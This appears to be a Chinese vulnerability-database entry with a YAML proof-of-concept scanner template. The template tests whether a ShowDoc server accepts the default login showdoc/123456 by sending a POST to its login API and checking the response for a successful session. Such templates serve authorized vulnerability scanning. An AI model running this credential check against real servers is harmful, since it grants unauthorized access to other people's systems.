showdoc-default-password: Showdoc Default Password

日期: 2025-09-01 | 影响软件: showdoc default password | POC: 已公开

漏洞描述

app="ShowDoc"

PoC代码[已公开]

id: showdoc-default-password

info:
    name: Showdoc Default Password
    author: B1anda0(https://github.com/B1anda0)
    severity: high
    verified: true
    description: app="ShowDoc"

rules:
    r0:
        request:
            method: POST
            path: /server/index.php?s=/api/user/login
            body: username=showdoc&password=123456
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(b'"username":"showdoc"') && response.body.bcontains(b'"uid":"1"') && response.body.bcontains(b'"error_code":0') && response.raw_header.bcontains(b'Set-Cookie:')
expression: r0()

相关漏洞推荐